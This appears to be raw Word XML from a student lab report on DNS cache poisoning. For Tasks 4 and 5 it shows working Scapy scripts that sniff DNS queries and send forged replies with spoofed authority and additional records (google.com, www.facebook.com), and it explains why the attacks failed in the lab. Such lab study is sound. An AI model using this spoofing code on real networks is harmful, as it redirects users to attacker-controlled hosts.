    <w:p w14:paraId="4D9C93CC"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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADECD1C" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206F500A"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sniffed_ip  = pkt[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E5131"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sniffed_udp = pkt[UDP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DC287"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sniffed_dns = pkt[DNS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCAD4E" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15915145"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ip       = IP(src=sniffed_ip.dst, dst=sniffed_ip.src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E785EF"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udp      = UDP(sport=53, dport=sniffed_udp.sport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709C857"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Anssec   = DNSRR(rrname=sniffed_dns.qd.qname, type="A", ttl=259200, rdata="1.2.3.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D577306"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Nssec1   = DNSRR(rrname="example.com", type="NS", rdata="ns.attacker32.com", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4673D"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Nssec2   = DNSRR(rrname="google.com", type="NS", rdata="ns.attacker32.com", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B597759"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dns      = DNS(id=sniffed_dns.id, qd=sniffed_dns.qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=2, an=Anssec, ns=Nssec1/Nssec2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12446DF2"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spoofpkt = ip/udp/dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663AA3DF" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AD7C5F" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">        send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04894AF7" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220DA25A" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>myFilter = "udp and (src host {} and dst port 53)".format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63059C1E" w14:textId="01B76F27" w:rsidR="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pkt = sniff(iface="br-9dc788eb17b7", filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FDA5F" w14:textId="2BA77288" w:rsidR="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D"/>
    <w:p w14:paraId="51E18F11" w14:textId="73C36D65" w:rsidR="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:r>
        <w:t>After running this attack and checking the local DNS server cache, we can see that the attack was not successful:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7449F212" wp14:editId="6766F49F">
            <wp:extent cx="5943600" cy="312928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943600" cy="3129280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48C2A4" w14:textId="40DD195A" w:rsidR="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:r>
        <w:t>There is no entry for google.com in the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D225700" w14:textId="294EC60B" w:rsidR="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:r>
        <w:t xml:space="preserve">The attack was not successful because </w:t>
      </w:r>
      <w:r w:rsidR="00EA35E5">
        <w:t>our name server doesn’t have a zone mapping for google.com. It cannot provide a fake mapping unless we explicitly configure it to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E105436" w14:textId="6E302F59" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00E3047D">
      <w:r>
        <w:t>The screenshot below shows the zone mappings available on the name server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49954AF7" w14:textId="4E0BFE9F" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00E3047D">
      <w:r w:rsidRPr="00EA35E5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="157CB0CF" wp14:editId="7BB79CEC">
            <wp:extent cx="3213100" cy="1879600"/>
            <wp:effectExtent l="0" t="0" r="635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3226397" cy="1887378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D340163" w14:textId="54D3CA50" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 5: Spoofing records in the additional section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C054B2F" w14:textId="108455A8" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:r>
        <w:t>The additional section of a DNS response is mainly used to provide mappings for hostnames appearing in the authority section. The aim of this task is to spoof this part of the DNS response and poison the local DNS server’s cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12352BC4" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDCB295" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BBB054" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10687B2F" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A666F" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2848782F" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>target  = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F375DF7" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CC418" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9B8DD6" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469CF84C"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if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE663C"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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4D17A" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017532AE"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sniffed_ip  = pkt[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825EC58"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sniffed_udp = pkt[UDP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8A91D"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sniffed_dns = pkt[DNS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC84E8" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06737F6E"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ip       = IP(src=sniffed_ip.dst, dst=sniffed_ip.src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC512A"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udp      = UDP(sport=53, dport=sniffed_udp.sport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2868E"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Anssec   = DNSRR(rrname=sniffed_dns.qd.qname, type="A", ttl=259200, rdata="1.2.3.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620EEAB"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Nssec1   = DNSRR(rrname="example.com", type="NS", rdata="ns.attacker32.com", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68710457"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Nssec2   = DNSRR(rrname="google.com", type="NS", rdata="ns.attacker32.com", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C05EF0"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Addsec1  = DNSRR(rrname="ns.attacker32.com", type="A", rdata="1.2.3.4", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906F527" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Addsec2  = DNSRR(rrname="ns.example.net", type="A", rdata="5.6.7.8", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF7BC72"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Addsec3  = DNSRR(rrname="www.facebook.com", type="A", rdata="3.4.5.6", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D05551A"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dns      = DNS(id=sniffed_dns.id, qd=sniffed_dns.qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=2, arcount=3, an=Anssec, ns=Nssec1/Nssec2, ar=Addsec1/Addsec2/Addsec3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009EB1AC"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spoofpkt = ip/udp/dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6312C443"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620021B2" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">        send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19896C" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B9D353" w14:textId="77777777" w:rsidR="00EA35E5" w:rsidRPr="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>myFilter = "udp and (src host {} and dst port 53)".format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D477" w14:textId="5B495523" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA35E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pkt = sniff(iface="br-9dc788eb17b7", filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275413C8" w14:textId="5F87A0FE" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71381918" w14:textId="3E4B8FC7" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:r>
        <w:t>The source code contains three mappings in the additional section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D78BF3" w14:textId="7A40D469" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ns.attacker32.com</w:t>
      </w:r>
      <w:r w:rsidR="008676A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>---&gt; 1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC42E27" w14:textId="133D82B4" w:rsidR="00EA35E5" w:rsidRDefault="00EA35E5" w:rsidP="00EA35E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ns.example.net</w:t>
      </w:r>
      <w:r w:rsidR="008676A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">---&gt; </w:t>
      </w:r>
      <w:r w:rsidR="008676A4">
        <w:t>5.6.7.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C93A88" w14:textId="04D2864A" w:rsidR="008676A4" w:rsidRDefault="008676A4" w:rsidP="00EA35E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="004342D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.facebook.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ---&gt; 3.4.5.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76865F" w14:textId="5F965E69" w:rsidR="008676A4" w:rsidRDefault="008676A4" w:rsidP="008676A4"/>
    <w:p w14:paraId="26B0BE02" w14:textId="66AED8AD" w:rsidR="008676A4" w:rsidRDefault="008676A4" w:rsidP="008676A4">
      <w:r>
        <w:t>The attack was unsuccessful due to the same underlying reason as task 4:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE81155" wp14:editId="5E867121">
            <wp:extent cx="5943600" cy="3096260"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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p>
    <w:p w14:paraId="5CBB4EF2" w14:textId="2BDA07BE" w:rsidR="008676A4" w:rsidRPr="00EA35E5" w:rsidRDefault="008676A4" w:rsidP="008676A4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The local DNS server should have zone mappings for the domain names included in the additional section of the DNS response. Since, the server doesn’t have those, the attack failed.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008676A4" w:rsidRPr="00EA3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C028E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="507868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F4693"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="507E7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9227386">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="753085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F6"/>
    <w:rsid w:val="000560FF"/>
    <w:rsid w:val="001B4E95"/>
    <w:rsid w:val="00464EA9"/>
    <w:rsid w:val="004E43EC"/>
    <w:rsid w:val="005531F6"/>
    <w:rsid w:val="00565764"/>
    <w:rsid w:val="005735B3"/>
    <w:rsid w:val="006658AB"/>
    <w:rsid w:val="007955BE"/>
    <w:rsid w:val="008676A4"/>
    <w:rsid w:val="00BD7A75"/>
    <w:rsid w:val="00E3047D"/>
    <w:rsid w:val="00E4540E"/>
    <w:rsid w:val="00EA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95D12"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{369ACCB9-D6EC-40C8-B7BB-2E4CB2ECF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4E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E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4E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5764"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00565764"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005657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facebook.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example.com"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example.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example.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-02T18:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-02T20:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>